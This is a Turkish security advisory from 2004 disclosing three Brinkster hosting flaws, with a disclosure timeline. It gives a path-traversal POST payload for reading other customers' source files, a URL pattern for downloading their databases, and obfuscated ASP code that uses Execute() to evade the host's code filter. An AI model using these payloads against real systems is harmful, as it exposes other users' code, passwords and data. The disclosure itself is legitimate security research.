Brinkster Güvenlik Açıkları - Türkçe

9-2-2004

- ------------------------------------------------------ BRINKSTER GÜVENLİK AÇIKLARI - TÜRKÇE - ------------------------------------------------------ For English : http://ferruh.mavituna.com/article/?435 Online Adres : http://ferruh.mavituna.com/article/?437 1. Diğer kullanıcıların kaynak koduna ulaşma Şiddet: Yüksek 2. Diğer Kullanıcıların Veritabanı Dosyalarına Ulaşma Şiddet: Orta 3. Brinkster Kod Kontollerini Geçme Şiddet: Orta - ------------------------------------------------------ BRINKSTER HAKKINDA - ------------------------------------------------------ Brinkster ücretsiz ve ücretli şekilde hosting hizmeti sağlayan popüler bir web hosting firmasıdır. www.brinskter.com - ------------------------------------------------------ AÇIK DURUMU; - ------------------------------------------------------ (1/26/2004) tarihi itibarı ile halen Brinskter.com açıktır; - ------------------------------------------------------ 1.DİĞER KULLANINILARIN KODLARINA ULAŞMA - ------------------------------------------------------ Herhangi bir geçerli kullanıcı diğer Brinkster kullanıcılarının kodlarına ulaşabilir. Bunun için ilgili kullanıcı adını ve dosyanın adını bilmesi yeterlidir. Dolayısıyla bir saldırgan diğer brinkster üyelerinin dosyalarının kaynak kodlarını, şifrelerini ve herhangi bir dosyalarının içeriğini görebilir. .asp, .aspx vs. tarzı Serverda işlenen dosyalar olsa bile. Bu sorun Brinkster' in Dosya yönetim programı ile ilgilidir (http://www.brinkster.com/FileManager.asp). Dosya Değiştirme sayfası (http://www.brinkster.com/FileManagerEdit.asp) saldıragnın diğer POST verilerini modifiye ederek diğer kullanıcılarının kaynak kodlarını görmesine izin verir. ------------------------------------------------------ URL : http://www.brinkster.com/FileManagerEdit.asp POST : faction=editfile&file2edit=%5C..%5C[KURBAN KULLANICI ADI]%5C[OKUNACAK DOSYANIN ADI] ------------------------------------------------------ - ------------------------------------------------------ 2. VERİTABANLARINA ERİŞİM - ------------------------------------------------------ Eğer bir Brinkster kullanıcısının veritabanı dosyasının adını biliyorsanız basit şekilde web üzerinden bu dosyayı download edebilirsiniz. Bu ismi ilk açıktaki yöntemle basitçe bulabilirsiniz. ------------------------------------------------------ Veritabanı Adresi; http://[BrinksterServer].brinkster.com/[Kullanıcıadı]/db/[Veritabanıadı] ------------------------------------------------------ - ------------------------------------------------------ 3. Kod Kontrollerini Geçme - ------------------------------------------------------ Brinkster ASP dosyalarında bazı kodlara izin vermez. Örnek olarak "Server.Scripttimeout = 8000" kodunu ücretsiz bir Brinkster üyesi kullanamaz. Dosya Yöneticisi otomatik olarka bu kodları tanı r ve o dosyaları henüz upload ederken iptal eder. Bu kontrol ASP' nin hazır fonksiyonu olan Execute() ile veya bazı sintaks numaraları ile geçilebilir. Bir stringi basit bir şekilde encode ve decode ederek execute() aracılığı ile çalıştırabilirsiniz. ------------------------------------------------------ Örnek Kodlar - İspat; ------------------------------------------------------ 1) Simple Method without Execute(); <% On _ Error Resume Next %> 2) Another Method with Execute(); <% Dim onErrorStr onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s u m e-N e x t" Execute(Replace(Replace(onErrorStr," ",""),"-"," ")) %> 3) Another one with a Ascii values and Execute(); This code allows you set "Server.Scripttimeout"; <% Dim converted Const errStr = "083101114118101114046083099114105112116084105109101111117116032061032 057048048048048048048048048 " converted = Asc2Str(errStr) Execute(converted) Response.Write converted Function Asc2Str(byVal text) Dim converted, character, i For i = 0 to Round((Len(text)-1)/3,0) If Len(text) > 2 Then character = Chr(Left(text,3)) converted = converted & character text = Right(text,Len(text)-3) End If Next Asc2Str = converted End Function %> ------------------------------------------------------ // -- ------------------------------------------------------ - ------------------------------------------------------ HISTORY; - ------------------------------------------------------ 01.01.2004 - Keşfedildi 01.18.2004 - Brinkster Bilgilendirildi 02.08.2004 - Yayınlandı 02.09.2004 - Türkçe Doküman Yayınlandı - ------------------------------------------------------ Vendor Status; - ------------------------------------------------------ 2 defa tüm detaylar ile iletişim kurulmasına rağmen hiç cevap alınamadı Ferruh Mavituna Web Uygulaması Güvenlik Uzmanı http://ferruh.mavituna.com

Recent Blog Posts

See all of the blog posts